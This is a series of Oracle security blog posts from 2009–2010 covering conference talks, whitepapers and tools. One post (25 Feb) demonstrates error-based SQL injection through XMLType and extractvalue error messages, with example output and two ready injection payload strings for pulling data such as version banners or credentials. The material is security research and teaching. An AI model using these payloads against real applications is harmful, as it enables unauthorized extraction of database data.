12 Apr 2010 von Alexander Kornbrust.

Wendel Guglielmetti Henrique  and Steve Ocepek will demonstrate at the upcoming Black Hat Europe 2010 in Barcelona (14-15 April) how to steal credentials by downgrading authentication mechanisms as well as overtaking existing user sessions. They will also show their thicknet tool which will be available after the conference.

This sounds similar to Laszlo work on downgrading JDBC. But I had already a chance to review their presentation so I know it is different.

More information after their presentation.

Geschrieben in Tools, SQL Injection, Oracle Security | Drucken | Keine Kommentare »

25 Feb 2010 von Alexander Kornbrust.

Today I came across a nice blog article “Methods of quick exploitation of blind SQL Injection Vulnerabilities in Oracle” from Dmitry Evteev about new techniques which can be used in error-based SQL injection. One of the comments contains an additional technique. Even if the title of the blog is not correct for Oracle (it’s not blind SQL Injection it’s error based which is a small but important difference) the idea itself is nice. Sometimes the SQL statements are more complicated than necessary.

Using error messages of XMLType:

The XMLType allows to create error messages containing custom strings (like database users, passwords, …). The string must start with a ‘<:’ that’s why we have to concatenate  ‘<:’  to the string.  Additionally the all spaces and at-signs must be replaced.

SQL> select XMLType((’<:’||user||’>’)) from dual;
ERROR:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName “:SYS” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

SQL> select XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)) from dual;
ERROR:
19
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName
“:Oracle9iEnterpriseEditionRelease9.2.0.8.0-Production” (not a Name)
Error at line 1
ORA-06512: at “SYS.XMLTYPE”, line 0
ORA-06512: at line 1

This can be used in an SQL Injection statement:

or 1=length(XMLType((’<:’||replace((select banner from v$version where rownum=1) ,’ ‘,”)||’>’)))–

The second technique is mentioned in the comments: 

SQL> select extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)) from dual;

*
ERROR at line 1:
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00601: Invalid token in: ‘/$Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product‘

 This can be used in an SQL Injection statement:

or 1=length(extractvalue(xmltype(’<x/>’),’/$’||(SELECT banner FROM v$version where rownum=1)))–

Geschrieben in SQL Injection | Drucken | 1 Kommentar »

22 Feb 2010 von Alexander Kornbrust.

Sumit Siddarth (Sid) has just published a really good whitepaper about “Hacking Oracle from the Web“.This is the most comprehensive published collection of different techniques for attacking Oracle from the web. Sid spent a lot of time composing the different techniques mentioned in various presentations and whitepapers.

Sid describes various techniques like data extraction (inband techniques like union or error messages, out-of-band techniques like heavy queries, blind, …), privilege escalation (sys.kupp$proc, dbms_repcat_rpc and dbms_export_extension)  and OS code execution.

Well done Sid.

Geschrieben in Exploit, SQL Injection, Security | Drucken | Keine Kommentare »

15 Feb 2010 von Alexander Kornbrust.

Mike Smithers, a former colleague, maintains a nice blog called “The Anti-Kyte“. He wrote a really interesting article “Self-Inflicted SQL Injection – don’t quote me !” about SQL Injection in Oracle.

Well written Mike.

Geschrieben in SQL Injection, Oracle Security, Allgemein | Drucken | Keine Kommentare »

13 Okt 2009 von Alexander Kornbrust.

Just back from a short trip to the Oracle Openworld where I gave a presentation “SQL Injection Crash Course for Developers“. This was the first time I talked at the Openworld in San Francisco. The feedback from the attendees was quite good.

In the SQL Injection presentation I showed some screenshots of the brand new web application scanner Netsparker (previously known as Dilemma) from Mavituna Security.

Netsparker is one of the most advanced web application scanner. Really professional GUI, easy to use. Well done Ferruh

Supports the execution of SQL statements and OS commands on the DB server.

I also met the APEX team from Oracle and had a long interesting chat with them. Joel Kallmann gave me a few tips how to harden my APEX 3.2.1 installation using mod_plsql.

What else happened in the Oracle security scene?

Slavik posted today an interesting blog entry about SQL Injection too.

Today Pete Finnigan published an entry about spoofing users and programs in Oracle. In his blog entry he mentions also the bug DB18 from January 2006, found by Imperva. AFAIK I was the first came up with the idea patching the oraclient9.dll  using a hex editor and then I sent an email with a description to Pete.

Nowadays this trick is no longer necessary for exploiting this after David Litchfield released a small tool (part of OAK - Oracle Assessment Kit) called ora-auth-alter-session.exe. But for many other applications the client patching technique can be really useful.

Geschrieben in Tools, SQL Injection, Oracle Security, Allgemein | Drucken | Keine Kommentare »